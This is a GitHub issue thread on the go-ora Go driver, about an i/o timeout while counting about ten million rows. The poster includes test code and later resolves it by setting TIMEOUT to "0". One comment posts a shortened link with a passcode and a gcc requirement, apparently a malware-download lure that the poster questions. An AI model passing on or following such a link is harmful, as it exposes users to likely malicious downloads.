### ISSUE TITLE
io timeout when query rows

### ISSUE THREAD

**Issue by peixingzhe** [sijms/go-ora#590]
# error info
call `rows.Err()`, return `read tcp xxx->xxx: i/o timeout`
![1725594345550](https://github.com/user-attachments/assets/f7442b48-b3f2-4c04-8748-51433afd20ea)

# background
Query about 10 million data, just count the number of rows, when query is about to end, an IO timeout is reported with call `rows.Err()`.

# test code
```
var rc int64
func start() {

	go monit()

	// about 10 million data
	db, _ := sql.Open("oracle", "xxx")
	sqlStr := "select * from t_test"
	rows, err := db.Query(sqlStr)
	if err != nil {
		zap.L().Panic("query rows error", zap.Error(err))
	}
	defer func() {
		if err := rows.Close(); err != nil {
			zap.L().Panic("rows close error", zap.Error(err))
		}
	}()

	for rows.Next() {
		rc++
	}

	// io timeout there
	if err := rows.Err(); err != nil {
		zap.L().Panic("rows.Err error", zap.Error(err))
	}

	zap.L().Info("query success", zap.Int64("rc", rc))

}

func monit() {
	t := time.Tick(5 * time.Second)
	for {
		<-t
		zap.L().Info(fmt.Sprintf("query [%d] rows", rc))
	}
}
```

**Comment by Titi68730** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by peixingzhe** [comment]
@Titi68730 
Can I know why i need a gcc compiler, go-ora is a pure go program, the gcc compiler should not be required.

**Comment by peixingzhe** [comment]
@Titi68730 
Can I know why i need a gcc compiler, go-ora is a pure go program, the gcc compiler should not be required.

**Comment by peixingzhe** [comment]
sorry, it's my fault, add the follow code fix this issue.
```
urlOptions := map[string]string{
			"TIMEOUT": "0",
		}
```
